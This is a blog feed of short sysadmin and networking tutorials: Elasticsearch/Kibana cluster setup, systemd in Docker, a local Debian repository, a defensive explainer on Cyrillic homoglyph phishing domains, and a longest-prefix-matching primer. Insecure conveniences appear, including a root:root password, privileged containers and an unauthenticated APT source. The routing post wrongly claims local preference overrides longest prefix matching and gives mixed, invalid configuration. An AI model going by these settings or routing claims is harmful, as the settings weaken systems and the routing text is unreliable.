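<p>The <code>elasticsearch</code> system user (created by the <code>.deb</code> package) must be able to read the keystore, so it is worth tightening permissions after copying: on a real node that would be <code>sudo chown root:elasticsearch</code> plus <code>chmod 640</code> on the file. The sketch below demonstrates the permission change against a throwaway placeholder directory rather than the live <code>/etc/elasticsearch</code>:</p>

```shell
# Placeholder directory standing in for /etc/elasticsearch (real paths need sudo)
ES_CONF=/tmp/es-conf-demo
mkdir -p "$ES_CONF/certs"
touch "$ES_CONF/certs/elastic-certificates.p12"

# Owner read/write, group read, no world access (mode 640)
chmod 640 "$ES_CONF/certs/elastic-certificates.p12"
stat -c '%a %n' "$ES_CONF/certs/elastic-certificates.p12"
```

On the real node, a read failure on this file typically shows up as an <code>AccessDeniedException</code> in the Elasticsearch startup log.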
<h2 id="heading-configure-elasticsearchyml"><strong>Configure elasticsearch.yml</strong></h2>
<p>Assign a unique <code>node.name</code> for each node and add the necessary cluster settings:</p>
<pre><code class="lang-plaintext">sudo vim /etc/elasticsearch/elasticsearch.yml
</code></pre>
<p><strong>Configure on es-node1 / es-node2 / es-node3</strong></p>
<pre><code class="lang-plaintext">cluster.name: es-cluster
node.name: node-1 # change this on each node (node-1 / node-2 / node-3)
network.host: 0.0.0.0

path.data: /opt/elasticsearch/data # adjust to your chosen data path
path.logs: /opt/elasticsearch/logs # adjust to your chosen log path

# List of cluster node IPs
discovery.seed_hosts: ["192.168.234.128", "192.168.234.129","192.168.234.130"]

# Specify master-eligible nodes for initial cluster formation (remove or comment out after initial setup)
cluster.initial_master_nodes: ["node-1", "node-2","node-3"]

# SSL/TLS settings
xpack.security.transport.ssl.enabled: true
xpack.security.transport.ssl.verification_mode: certificate
xpack.security.transport.ssl.client_authentication: required
xpack.security.transport.ssl.keystore.path: elastic-certificates.p12
xpack.security.transport.ssl.truststore.path: elastic-certificates.p12
</code></pre>
<p><strong>Note:</strong> The <code>cluster.initial_master_nodes</code> setting is only necessary during the initial cluster formation. After the cluster is established, this setting should be removed or commented out. (Refer to <a target="_blank" href="https://www.elastic.co/guide/en/elasticsearch/reference/current/modules-discovery-bootstrap-cluster.html">Bootstrapping a cluster</a>)</p>
<h1 id="heading-start-cluster-and-verify"><strong>Start Cluster and Verify</strong></h1>
<p>Start the Elasticsearch service on each node and then verify the cluster status.</p>
<p>Start the service:</p>
<pre><code class="lang-plaintext">sudo systemctl start elasticsearch
</code></pre>
<p>Reset the password for the <code>elastic</code> account:</p>
<pre><code class="lang-plaintext">sudo /usr/share/elasticsearch/bin/elasticsearch-reset-password -u elastic -i
</code></pre>
<p>Check the node status:</p>
<pre><code class="lang-plaintext">curl -u elastic:your_pass http://192.168.234.128:9200/_cat/nodes?v
==============================================================================
ip              heap.percent ram.percent cpu load_1m load_5m load_15m node.role   master name
192.168.234.130           19          89  88    1.30    0.80     0.37 cdfhilmrstw -      node-3
192.168.234.129           24          89   9    0.29    0.17     0.13 cdfhilmrstw -      node-2
192.168.234.128           10          90  17    0.00    0.00     0.00 cdfhilmrstw *      node-1
</code></pre>
<p>Check the cluster health:</p>
<pre><code class="lang-plaintext">curl -u elastic:your_pass http://192.168.234.128:9200/_cluster/health?pretty
==============================================================================
{
  "cluster_name" : "es-cluster",
  "status" : "green",
  "timed_out" : false,
  "number_of_nodes" : 3,
  "number_of_data_nodes" : 3,
  "active_primary_shards" : 3,
  "active_shards" : 6,
  "relocating_shards" : 0,
  "initializing_shards" : 0,
  "unassigned_shards" : 0,
  "unassigned_primary_shards" : 0,
  "delayed_unassigned_shards" : 0,
  "number_of_pending_tasks" : 0,
  "number_of_in_flight_fetch" : 0,
  "task_max_waiting_in_queue_millis" : 0,
  "active_shards_percent_as_number" : 100.0
}
</code></pre>
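<p>If you want to repeat this check from a script instead of eyeballing the JSON, the health document can be validated programmatically. Below is a minimal Python sketch; the sample JSON is trimmed from the response above, and in practice you would fetch it with the <code>curl</code> command shown:</p>

```python
import json

# Sample response from the _cluster/health endpoint, trimmed to the
# fields we check. In practice, fetch it with:
#   curl -u elastic:your_pass http://192.168.234.128:9200/_cluster/health
health_json = """
{
  "cluster_name": "es-cluster",
  "status": "green",
  "number_of_nodes": 3,
  "unassigned_shards": 0
}
"""

def cluster_ok(raw: str, expected_nodes: int = 3) -> bool:
    """Return True if the cluster is green, fully formed, and has no unassigned shards."""
    health = json.loads(raw)
    return (health["status"] == "green"
            and health["number_of_nodes"] == expected_nodes
            and health["unassigned_shards"] == 0)

print(cluster_ok(health_json))  # True when all three nodes have joined
```

This is handy as a post-deployment smoke test: anything other than <code>green</code> with three nodes fails fast.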
<h1 id="heading-kibana-integration"><strong>Kibana Integration</strong></h1>
<p>For security reasons, the <code>elastic</code> superuser should not be used as Kibana's service account; instead, the built-in <code>kibana_system</code> account is used.</p>
<p>Reset the password for the <code>kibana_system</code> account:</p>
<pre><code class="lang-plaintext">sudo /usr/share/elasticsearch/bin/elasticsearch-reset-password -u kibana_system -i
</code></pre>
<h2 id="heading-download-and-install-kibana">Download and install Kibana</h2>
<p>The Debian package for Kibana 9.1.0 can be downloaded from the website and installed as follows:</p>
<pre><code class="lang-sh">wget https://artifacts.elastic.co/downloads/kibana/kibana-9.1.0-amd64.deb
wget https://artifacts.elastic.co/downloads/kibana/kibana-9.1.0-amd64.deb.sha512
shasum -a 512 -c kibana-9.1.0-amd64.deb.sha512
sudo dpkg -i kibana-9.1.0-amd64.deb
</code></pre>
<h2 id="heading-configure-kibanayml"><strong>Configure kibana.yml</strong></h2>
<p><strong>kibana.yml</strong></p>
<pre><code class="lang-plaintext">server.port: 5601
server.host: "0.0.0.0"
elasticsearch.hosts: ["http://192.168.234.128:9200","http://192.168.234.129:9200","http://192.168.234.130:9200"]
elasticsearch.username: "kibana_system"
elasticsearch.password: "your_pass"
</code></pre>
<h4 id="heading-kibana-startup"><strong>Kibana Startup</strong></h4>
<p>Since Kibana was installed from the Debian package, start it with systemd:</p>
<pre><code class="lang-plaintext">sudo systemctl start kibana
</code></pre>
<p>Now, access <a target="_blank" href="http://192.168.234.128:5601">http://192.168.234.128:5601</a> (or the IP address of the node where Kibana is installed) in a web browser and log in with the elastic account.</p>
<h1 id="heading-troubleshoot-common-problem">Troubleshooting a common problem</h1>
<p>When joining a new node to the cluster, you just need to copy the certificate file <code>elastic-certificates.p12</code> to the new node.</p>
<p>However, when a node is first initialized, Elasticsearch has already created an <code>elasticsearch.keystore</code> file, and it will prompt for the previous keystore password:</p>
<pre><code class="lang-plaintext">Caused by: org.elasticsearch.common.ssl.SslConfigException: cannot read configured [PKCS12] keystore (as a truststore) [/etc/elasticsearch/certs/elastic-certificates.p12] - this is usually caused by an incorrect password; (a keystore password was provided)

        at org.elasticsearch.common.ssl.SslFileUtil.ioException(SslFileUtil.java:58) ~[?:?]
</code></pre>
<p>You need to recreate the <code>elasticsearch.keystore</code> and set the correct keystore password (or a blank one).</p>
<pre><code class="lang-plaintext"># Remove the transport layer keystore
rm /etc/elasticsearch/elasticsearch.keystore

# Add the password for the transport layer keystore
/usr/share/elasticsearch/bin/elasticsearch-keystore add xpack.security.transport.ssl.keystore.secure_password
The elasticsearch keystore does not exist. Do you want to create it? [y/N]y
Enter value for xpack.security.transport.ssl.keystore.secure_password:

/usr/share/elasticsearch/bin/elasticsearch-keystore add xpack.security.transport.ssl.truststore.secure_password
Enter value for xpack.security.transport.ssl.truststore.secure_password:
</code></pre>
<p>You will be prompted to enter the password for your <code>.p12</code> file for each command. <strong>Enter the same password you created when you generated the certificate.</strong></p>
<p>If you generated the certificate with a blank password, just press Enter.</p>
<h1 id="heading-conclusion">Conclusion</h1>
<p>I introduced a simple way to install Elasticsearch and Kibana and set up a three-node cluster.</p>
<p>The Debian package installation method is easy to install and manage, making it useful in various environments. Hope you find it helpful!</p>
]]></content:encoded></item><item><title><![CDATA[Run systemctl inside a docker container]]></title><description><![CDATA[Why systemd is tricky in Docker
systemd is designed to be a system init manager for an entire operating system, and Docker containers are designed to run a single process. This mismatch makes running systemd inside Docker non-trivial. However, it is ...]]></description><link>https://chinhnd.org/run-systemctl-inside-a-docker-container</link><guid isPermaLink="true">https://chinhnd.org/run-systemctl-inside-a-docker-container</guid><category><![CDATA[Docker]]></category><category><![CDATA[System Architecture]]></category><category><![CDATA[Linux]]></category><dc:creator><![CDATA[Nguyen Duc Chinh]]></dc:creator><pubDate>Sun, 15 Sep 2024 12:07:45 GMT</pubDate><enclosure url="https://cdn.hashnode.com/res/hashnode/image/stock/unsplash/HSACbYjZsqQ/upload/732523e86a5599c92820669b3e02921a.jpeg" length="0" type="image/jpeg"/><content:encoded><![CDATA[<h1 id="heading-why-systemd-is-tricky-in-docker">Why <code>systemd</code> is tricky in Docker</h1>
<p><code>systemd</code> is designed to be a system init manager for an entire operating system, and Docker containers are designed to run a single process. This mismatch makes running <code>systemd</code> inside Docker non-trivial. However, it is possible with some adjustments, and I will walk you through the process.</p>
<h1 id="heading-prerequisites">Prerequisites</h1>
<ul>
<li><p>Ensure you have Docker installed on your machine.</p>
</li>
<li><p>Familiarity with Docker commands.</p>
</li>
</ul>
<h1 id="heading-guide-to-run-systemd-in-an-ubuntu-docker-container">Guide to Run <code>systemd</code> in an Ubuntu Docker Container</h1>
<ol>
<li>Create a <code>Dockerfile</code> like the one below:</li>
</ol>
<pre><code class="lang-dockerfile"><span class="hljs-keyword">FROM</span> ubuntu:<span class="hljs-number">22.04</span>

<span class="hljs-keyword">RUN</span><span class="bash"> <span class="hljs-built_in">echo</span> <span class="hljs-string">'root:root'</span> | chpasswd</span>
<span class="hljs-keyword">RUN</span><span class="bash"> <span class="hljs-built_in">printf</span> <span class="hljs-string">'#!/bin/sh\nexit 0'</span> &gt; /usr/sbin/policy-rc.d</span>
<span class="hljs-keyword">RUN</span><span class="bash"> apt-get update</span>
<span class="hljs-keyword">RUN</span><span class="bash"> apt-get install -y systemd systemd-sysv dbus dbus-user-session</span>
<span class="hljs-keyword">RUN</span><span class="bash"> <span class="hljs-built_in">printf</span> <span class="hljs-string">"systemctl start systemd-logind"</span> &gt;&gt; /etc/profile</span>

<span class="hljs-keyword">ENTRYPOINT</span><span class="bash"> [<span class="hljs-string">"/sbin/init"</span>]</span>
</code></pre>
<p>Setting <code>/sbin/init</code> as the entrypoint is important: it boots <code>systemd</code> as PID 1, which enables <code>systemctl</code>.</p>
<ol start="2">
<li>Then build the image and run the container:</li>
</ol>
<pre><code class="lang-bash">docker build -t chinhnd/ubuntu-systemd -f Dockerfile .
docker run -it --privileged --cap-add=ALL chinhnd/ubuntu-systemd
</code></pre>
<h1 id="heading-access-the-running-container">Access the running container</h1>
<p>Now that your container is running <code>systemd</code>, you can access it and use <code>systemctl</code> inside the container.</p>
<ol>
<li><p><strong>Enter the container</strong>:</p>
<pre><code class="lang-bash"> docker <span class="hljs-built_in">exec</span> -it &lt;container_id&gt; bash
</code></pre>
<p> Replace <code>&lt;container_id&gt;</code> with the actual container ID from the <code>docker ps</code> output.</p>
<p> Then log in with root/root.</p>
</li>
<li><p><strong>Check if</strong> <code>systemd</code> is running:</p>
<p> Inside the container, run:</p>
<pre><code class="lang-bash"> systemctl
</code></pre>
<p> If everything is set up correctly, you should see the output from <code>systemctl</code> showing the system services running.</p>
</li>
</ol>
]]></content:encoded></item><item><title><![CDATA[The simplest way to locally distribute Debian packages]]></title><description><![CDATA[Sometime, you will need to install some packages on a remote machine without internet access.
Or, you want to distribute your own Debian packages in your environment.
The simplest way to do it is to setup your own local repository.

Requirements

pyt...]]></description><link>https://chinhnd.org/the-simplest-way-to-locally-distribute-debian-packages</link><guid isPermaLink="true">https://chinhnd.org/the-simplest-way-to-locally-distribute-debian-packages</guid><category><![CDATA[Linux]]></category><category><![CDATA[debian package]]></category><category><![CDATA[debian]]></category><dc:creator><![CDATA[Nguyen Duc Chinh]]></dc:creator><pubDate>Tue, 09 Jul 2024 11:00:43 GMT</pubDate><enclosure url="https://cdn.hashnode.com/res/hashnode/image/stock/unsplash/S6OvsSwm5sE/upload/e7c546a3d2d2db179159346634599e46.jpeg" length="0" type="image/jpeg"/><content:encoded><![CDATA[<p>Sometime, you will need to install some packages on a remote machine without internet access.</p>
<p>Or, you want to distribute your own Debian packages in your environment.</p>
<p>The simplest way to do this is to set up your own local repository.</p>
<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1720521730143/e9e3fd4a-4cb8-4d31-abad-4509d71c5313.png" alt class="image--center mx-auto" /></p>
<h1 id="heading-requirements"><strong>Requirements</strong></h1>
<ul>
<li><p>python3</p>
</li>
<li><p>dpkg-scanpackages: <code>sudo apt-get install dpkg-dev</code></p>
</li>
<li><p>gzip: <code>sudo apt-get install gzip</code></p>
</li>
</ul>
<h1 id="heading-create-your-repository-folder-structure"><strong>Create your</strong> repository folder <strong>structure</strong></h1>
<p>You can customize it, but I will keep my structure quick and simple:</p>
<p><code>mkdir -p ~/my_repo/debian</code></p>
<p>Then go to that directory:</p>
<p><code>cd ~/my_repo</code></p>
<h1 id="heading-add-your-deb-files-to-the-debian-folder"><strong>Add your .deb files to the debian folder</strong></h1>
<p><code>cp my_deb_thing.deb my_deb_thing2.deb ~/my_repo/debian</code></p>
<p>In this example, I have put two packages, for kibana and elasticsearch, in the <code>debian</code> folder.</p>
<h1 id="heading-create-packagesgz-file"><strong>Create Packages.gz file</strong></h1>
<p>You'll need to do this every time you add/update a .deb.</p>
<p><code>dpkg-scanpackages debian /dev/null | gzip -9c &gt; debian/Packages.gz</code></p>
<p>You'll get an output similar to:</p>
<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1720520722704/af4a04a4-d749-44f7-b201-f2c5f3cc5105.png" alt class="image--center mx-auto" /></p>
<p><code>dpkg-scanpackages</code> creates an index of your packages so that the Debian package manager can read them.</p>
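<p>The <code>Packages</code> index that <code>dpkg-scanpackages</code> emits is a series of RFC822-style "Field: value" stanzas. As a sketch of what APT actually reads, here is a minimal Python parser; the sample values below are made up for illustration:</p>

```python
# A simplified stanza in the style dpkg-scanpackages generates.
# The field names are real; the sample values are illustrative.
sample_stanza = """\
Package: my-deb-thing
Version: 1.0
Architecture: amd64
Filename: debian/my_deb_thing.deb
"""

def parse_stanza(text: str) -> dict:
    """Turn 'Field: value' lines into a dict (continuation lines ignored)."""
    fields = {}
    for line in text.splitlines():
        if ": " in line:
            key, value = line.split(": ", 1)
            fields[key] = value
    return fields

pkg = parse_stanza(sample_stanza)
print(pkg["Package"], pkg["Filename"])
```

The <code>Filename</code> field is why the folder layout matters: APT resolves it relative to the repository URL you configure below.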
<h1 id="heading-run-a-webserver-to-host-it"><strong>Run a webserver to host it</strong></h1>
<p>Any webserver will do; here I simply use Python's built-in HTTP server.</p>
<p><code>python3 -m http.server 9000</code></p>
<p>The port can be changed as needed.</p>
<h1 id="heading-configure-client-machines-to-point-to-your-debian-repository"><strong>Configure client machines to point to your debian repository</strong></h1>
<p>Add to client machine <code>/etc/apt/sources.list</code></p>
<p><code>deb [trusted=yes] http://your-server-ip:9000 debian/</code></p>
<p>Note that the packages are unauthenticated, so to suppress APT warnings you need the <code>[trusted=yes]</code> option.</p>
<p>When running <code>apt-get update</code>, we can see the client fetching the package indices:</p>
<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1720521173532/631bb805-4cb9-4ff1-8cd5-944d34b8d83c.png" alt class="image--center mx-auto" /></p>
<p>Then the client can install packages using the APT package manager, just like any normal package.</p>
<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1720521939337/df799f32-c8ce-4817-8242-36b4f0d403ee.png" alt class="image--center mx-auto" /></p>
<h1 id="heading-conclusion">Conclusion</h1>
<p>In this post, I show you a quick and easy way to host your own APT repo.</p>
<p>However, for the sake of simplicity, I didn't use a production-grade webserver, and I didn't secure the distribution process.</p>
<p>There are more secure methods, such as <code>apt-mirror</code> or <code>reprepro</code> combined with your own GPG signing key.</p>
]]></content:encoded></item><item><title><![CDATA[Beware behind the look: Cyrillic Characters in Phishing Emails]]></title><description><![CDATA[One tactic gaining traction is the use of Cyrillic characters to create deceptive domain names in email addresses and website links.
What are Cyrillic Characters?
Cyrillic is an alphabet used in many Eastern European and Slavic languages like Russian...]]></description><link>https://chinhnd.org/beware-behind-the-look-cyrillic-characters-in-phishing-emails</link><guid isPermaLink="true">https://chinhnd.org/beware-behind-the-look-cyrillic-characters-in-phishing-emails</guid><category><![CDATA[securityawareness]]></category><category><![CDATA[Security]]></category><dc:creator><![CDATA[Nguyen Duc Chinh]]></dc:creator><pubDate>Thu, 13 Jun 2024 07:21:55 GMT</pubDate><enclosure url="https://cdn.hashnode.com/res/hashnode/image/stock/unsplash/LPZy4da9aRo/upload/41316b11c3f6a26e7bd8c662fdb72c9c.jpeg" length="0" type="image/jpeg"/><content:encoded><![CDATA[<p>One tactic gaining traction is the use of Cyrillic characters to create deceptive domain names in email addresses and website links.</p>
<h1 id="heading-what-are-cyrillic-characters"><strong>What are Cyrillic Characters?</strong></h1>
<p>Cyrillic is an alphabet used in many Eastern European and Slavic languages like Russian, Ukrainian, and Bulgarian.</p>
<p>While some Cyrillic letters resemble Latin characters, they represent entirely different sounds.</p>
<p>This similarity is what phishers exploit.</p>
<h1 id="heading-how-do-they-trick-you"><strong>How Do They Trick You?</strong></h1>
<p>Phishers substitute certain Cyrillic characters for their Latin counterparts in domain names. For example, I can create a lookalike of my blog's domain using a Russian letter.</p>
<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1718262144092/5ad9dc6e-2fbf-4ae4-bb4c-eb039cc0814c.png" alt class="image--center mx-auto" /></p>
<p>Unaware users might not notice the subtle difference and click on the link, leading them to a fake website designed to steal login credentials, credit card details, or other sensitive information.</p>
<h1 id="heading-a-real-example">A Real Example</h1>
<p>In the screenshot below, we see a message supposedly sent from the domain <a target="_blank" href="http://apple.com">apple.com</a>. It looks really legitimate.</p>
<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1718262705115/400e1688-ba31-4d6d-ad55-0ffb0c51bd4d.png" alt class="image--center mx-auto" /></p>
<p>However, the logo looks cut off and the email design is unusual.</p>
<p>The fact is that the <a target="_blank" href="http://apple.com">apple.com</a> domain we saw above was not legitimate: what looks like the Latin letter “p” is in fact the Cyrillic letter “р”!</p>
<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1718261205997/7cd09c20-9964-4243-8613-cdaaef723b89.png" alt class="image--center mx-auto" /></p>
<p>Some browsers and email clients don't render these characters distinctly, so they can look exactly like Latin letters.</p>
<p>Only after you paste the domain into an application that distinguishes the alphabets can you see the difference.</p>
<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1718262657388/2b2e82f0-f341-4eba-b817-91566a6dc3e3.png" alt class="image--center mx-auto" /></p>
<p>There are many glyphs that look like English or Latin characters, for example:</p>
<p><img src="https://d2dzik4ii1e1u6.cloudfront.net/images/lexology/static/fe8ed7d0-0563-4d94-9d81-da55b09900c6.JPG" alt /></p>
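<p>One programmatic defense is to check a domain for mixed scripts before trusting it. Here is a small sketch using Python's standard <code>unicodedata</code> module; the Cyrillic "а" below is the real homoglyph, while the helper name is my own:</p>

```python
import unicodedata

def scripts_used(domain: str) -> set:
    """Collect the Unicode script (first word of the character name)
    for every alphabetic character in the domain."""
    return {unicodedata.name(ch).split()[0]
            for ch in domain if ch.isalpha()}

legit = "apple.com"
spoofed = "аpple.com"  # first letter is CYRILLIC SMALL LETTER A (U+0430)

print(scripts_used(legit))     # {'LATIN'}
print(scripts_used(spoofed))   # mixed LATIN and CYRILLIC: suspicious
print(spoofed.encode("idna"))  # the punycode (xn--...) form browsers may show
```

A domain mixing Latin and Cyrillic letters is a strong phishing signal, which is why modern browsers fall back to displaying the punycode form for such names.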
<h1 id="heading-how-to-protect-yourself"><strong>How to Protect Yourself</strong></h1>
<p>Here are some tips to stay safe from Cyrillic character phishing:</p>
<ul>
<li><p><strong>Inspect Sender Addresses Closely:</strong> Don't rely solely on the displayed name. Hover over the sender address to see the actual email address. Look for any inconsistencies or unusual characters, especially Cyrillic letters where Latin characters would be expected.</p>
</li>
<li><p><strong>Scrutinize Website Links:</strong> Before clicking a link, hover over it to see the actual URL displayed at the bottom of your browser window. Be wary of any URLs with Cyrillic characters or slight misspellings of legitimate website names.</p>
</li>
<li><p><strong>Think Before You Click:</strong> If an email seems suspicious, especially one with an urgent tone or a tempting offer, don't click on any links or attachments. It's better to be safe than sorry.</p>
</li>
<li><p><strong>Verify Information Independently:</strong> If an email appears to be from a legitimate source like your bank, don't click on any links within the email. Instead, log in to your account directly by typing the website address into your browser window or using the official app.</p>
</li>
<li><p><strong>Use Security Software:</strong> Consider using antivirus and anti-phishing software that can help identify and block malicious websites.</p>
</li>
</ul>
<h1 id="heading-stay-vigilant"><strong>Stay Vigilant!</strong></h1>
<p>By being aware of this tactic and following these simple tips, you can significantly reduce your risk of falling victim to Cyrillic character phishing scams.</p>
<p>Remember, cybercriminals are constantly evolving their methods, so staying vigilant and practicing good security habits is crucial in protecting your information.</p>
]]></content:encoded></item><item><title><![CDATA[How Longest Prefix Matching Affects Routing]]></title><description><![CDATA[When are two routes considered duplicates?
Route duplication is a situation where two or more routes to the same destination exist in a routing table.
This can happen for several reasons, such as misconfiguration, or the use of overlapping prefixes ...]]></description><link>https://chinhnd.org/how-longest-prefix-matching-effect-routing</link><guid isPermaLink="true">https://chinhnd.org/how-longest-prefix-matching-effect-routing</guid><category><![CDATA[networking]]></category><category><![CDATA[routing]]></category><category><![CDATA[network]]></category><dc:creator><![CDATA[Nguyen Duc Chinh]]></dc:creator><pubDate>Mon, 16 Oct 2023 04:07:57 GMT</pubDate><enclosure url="https://cdn.hashnode.com/res/hashnode/image/stock/unsplash/7nrsVjvALnA/upload/6c11bb8e4a3e42f45f6f608448dc918c.jpeg" length="0" type="image/jpeg"/><content:encoded><![CDATA[<h1 id="heading-when-will-two-routes-considered-duplicated">When are two routes considered duplicates?</h1>
<p>Route duplication is a situation where <strong>two or more routes to the same destination exist in a routing table</strong>.</p>
<p>This can happen for several reasons, such as misconfiguration, or the use of overlapping prefixes in different networks.</p>
<p>In some cases, it may be necessary to have two routes to the same destination, such as for load balancing or redundancy. However, in most cases, having duplicate routes is not necessary and can lead to problems.</p>
<p>Route duplication can cause many issues, including routing loops, black holes, and degraded performance. It is important to detect and avoid route duplication to ensure the smooth operation of your network.</p>
<h1 id="heading-longest-prefix-matching">Longest prefix matching</h1>
<p>Longest prefix matching (LPM) is a fundamental concept in networking that plays a critical role in IP routing. It allows for the efficient forwarding of packets, enables complex network policies, and is essential for the operation of the Internet.</p>
<p>In packet routing, there is a possibility of overlapping entries in the routing table. As a result, we must pick an IP prefix that is more specific to the destination address.</p>
<p>For example, suppose you want to send a letter to a receiver in district B of city A, and there are two possible mailmen to choose from:</p>
<ul>
<li><p>The first mailman, who works in a post office covering all of city A, can deliver the letter, but he has to search the whole city to find the receiver.</p>
</li>
<li><p>Another mailman works in a particular district B of that city. He lives in the same neighborhood and knows exactly where to find the receiver.</p>
</li>
</ul>
<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1695788083668/f6a7d4de-697e-499d-9853-6fb6bacbc5ca.png" alt class="image--center mx-auto" /></p>
<p>As a result, giving the letter to the second person is more efficient because he handles more localized regions.</p>
<p>LPM works in the same way. By comparing the destination IP address of a packet to the prefixes in a routing table, the router selects the route with <strong>the longest prefix or a more specific route</strong> that matches the destination IP address.</p>
<h2 id="heading-duplicate-routes">Duplicate routes</h2>
<p>For example, consider the following routing table:</p>
<div class="hn-table">
<table>
<thead>
<tr>
<td><strong>Prefix</strong></td><td>Destination</td><td><strong>Next hop</strong></td></tr>
</thead>
<tbody>
<tr>
<td>192.168.1.0/24</td><td>192.168.1.100</td><td>192.168.1.1</td></tr>
<tr>
<td>192.168.0.0/16</td><td>192.168.1.100</td><td>192.168.0.1</td></tr>
</tbody>
</table>
</div><p>If the router receives a packet with the destination IP address 192.168.1.100, it will use the first route in the routing table, because it has <strong>the longest prefix that matches the destination IP address.</strong></p>
<p>The second route would also match the destination IP address, but it is less specific because it has a shorter prefix.</p>
<p>The longest prefix rule is used by all IP routers, regardless of the routing protocol that they are using. It is also used in other networking technologies, such as MPLS and BGP.</p>
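<p>The selection above can be reproduced with Python's standard <code>ipaddress</code> module. A small sketch using the two routes from the table:</p>

```python
import ipaddress

# Routing table from the example above: (prefix, next hop)
routes = [
    ("192.168.1.0/24", "192.168.1.1"),
    ("192.168.0.0/16", "192.168.0.1"),
]

def longest_prefix_match(dest: str, table):
    """Return the next hop of the most specific route containing dest."""
    addr = ipaddress.ip_address(dest)
    matches = [(ipaddress.ip_network(p), nh) for p, nh in table
               if addr in ipaddress.ip_network(p)]
    if not matches:
        return None
    # The most specific route is the one with the longest prefix.
    return max(matches, key=lambda m: m[0].prefixlen)[1]

print(longest_prefix_match("192.168.1.100", routes))  # 192.168.1.1 (the /24 wins)
```

Both routes contain 192.168.1.100, but the /24 has the longer prefix, so its next hop is chosen, exactly as the table walk-through describes.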
<h2 id="heading-overlapping-subnets">Overlapping subnets</h2>
<p>The longest prefix rule can also be used to handle overlapping subnets. For example, consider the following subnets:</p>
<ul>
<li><p>192.168.1.0/24</p>
</li>
<li><p>192.168.1.128/25</p>
</li>
</ul>
<p>In this case, the two subnets overlap: the IP addresses 192.168.1.128 to 192.168.1.255 belong to both. If a router on this network receives a packet with the destination IP address 192.168.1.130, it will use the longest prefix rule to determine which subnet to forward the packet to.</p>
<p>The longest prefix that matches the destination IP address is 192.168.1.128/25, so the router will forward the packet to the 192.168.1.128/25 subnet.</p>
<h1 id="heading-undesirable-routing-with-lpm">Undesirable routing with LPM</h1>
<p>When you already have a route to a specific host and a new route is received with a longer prefix, the new route will take precedence. This is because LPM always chooses the most specific route to forward a packet.</p>
<p>For example, consider the following scenario:</p>
<ul>
<li><p>You have a route with the prefix 192.168.1.0/24, and next-hop to 192.168.1.24</p>
</li>
<li><p>You receive a new route with the prefix 192.168.1.100/32, and next-hop to 192.168.1.28</p>
</li>
</ul>
<p>In this scenario, the new route with the prefix 192.168.1.100/32 will take precedence. This means that any packets destined for the host 192.168.1.100 will be forwarded to 192.168.1.28 even though you already have a route to the host 192.168.1.100 with the next-hop 192.168.1.24.</p>
<p>In real-world scenarios, network engineers often want a specific path to direct the traffic to and don't want the traffic to go to a new route. In this case, LPM behavior can be undesirable.</p>
<h1 id="heading-control-lpm-behavior">Control LPM behavior</h1>
<p>To prevent the router from using a new route with a longer prefix, you can use a routing policy. A routing policy is a set of rules that control how the router selects and forwards packets.</p>
<p>Here is a simplified, Cisco-style example of a route-map that prefers the routes you specify over other learned routes (exact syntax varies by platform and routing protocol):</p>
<pre><code class="lang-bash">route-map PREFERED_ROUTES
  match ip address prefix-list PREFERED_ROUTES_LIST
  <span class="hljs-built_in">set</span> local-preference 100
!
interface Ethernet0/0
  ip route-policy PREFERED_ROUTES <span class="hljs-keyword">in</span>
end
</code></pre>
<p>This routing policy matches all routes for prefixes defined in <code>prefix-list PREFERED_ROUTES_LIST</code> and sets their local preference to 100.</p>
<p>The local preference is a metric the router uses to choose between multiple routes: a higher local preference indicates a more preferred route. This way, the routes you define in the prefix list will win over other learned routes.</p>
<p>This is just a simple example of manipulating the effect of LPM. You can use this to your advantage to create more complex routing policies.</p>
<p>It is important to note that if you have multiple routing policies configured on an interface, the router will apply the first routing policy that matches the packet.</p>
<h1 id="heading-advantages-and-disadvantages-of-lpm">Advantages and disadvantages of LPM</h1>
<p>LPM helps prevent duplicate routes in the routing table of a router. This is because LPM will always choose the most specific route to forward a packet. This comes with several benefits:</p>
<ul>
<li><p><strong>Improved performance:</strong> By using the most specific route, the router can forward packets more quickly and efficiently.</p>
</li>
<li><p><strong>Increased reliability:</strong> The longest prefix rule helps to reduce the chance of routing loops and other problems.</p>
</li>
<li><p><strong>Scalability:</strong> The longest prefix rule can be used to scale networks of any size.</p>
</li>
</ul>
<p>Despite that, there are a few potential negatives to using LPM:</p>
<ul>
<li><p><strong>Increased complexity:</strong> LPM can be more complex to implement than other routing algorithms, such as static routing. This is because LPM requires the router to maintain a trie of all of the prefixes in its routing table.</p>
</li>
<li><p><strong>Increased overhead:</strong> For every packet, the router must walk the trie bit by bit to find the longest prefix that matches the destination IP address.</p>
</li>
<li><p><strong>Potential for routing loops:</strong> This can happen if there are two or more routes in the routing table that have the same prefix length and the next hop addresses for those routes are different.</p>
</li>
</ul>
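<p>To make the trie idea in the bullets above concrete, here is a toy binary trie over IPv4 prefixes. This is only an illustration of the per-bit walk, not how production routers implement their forwarding tables:</p>

```python
import ipaddress

class TrieNode:
    __slots__ = ("children", "next_hop")
    def __init__(self):
        self.children = [None, None]  # one child per bit value
        self.next_hop = None          # set when a prefix ends at this node

def bits(prefix):
    """Yield the leading prefixlen bits of a network, most significant first."""
    net = ipaddress.ip_network(prefix)
    raw = int(net.network_address)
    return [(raw >> (31 - i)) & 1 for i in range(net.prefixlen)]

def insert(root, prefix, next_hop):
    node = root
    for b in bits(prefix):
        if node.children[b] is None:
            node.children[b] = TrieNode()
        node = node.children[b]
    node.next_hop = next_hop

def lookup(root, dest):
    """Walk the destination's bits, remembering the deepest next hop seen."""
    raw = int(ipaddress.ip_address(dest))
    node, best = root, None
    for i in range(32):
        if node.next_hop is not None:
            best = node.next_hop
        node = node.children[(raw >> (31 - i)) & 1]
        if node is None:
            break
    else:
        if node.next_hop is not None:
            best = node.next_hop
    return best

root = TrieNode()
insert(root, "192.168.0.0/16", "192.168.0.1")
insert(root, "192.168.1.0/24", "192.168.1.1")
print(lookup(root, "192.168.1.100"))  # 192.168.1.1 (the /24 wins)
print(lookup(root, "192.168.2.7"))    # 192.168.0.1 (only the /16 matches)
```

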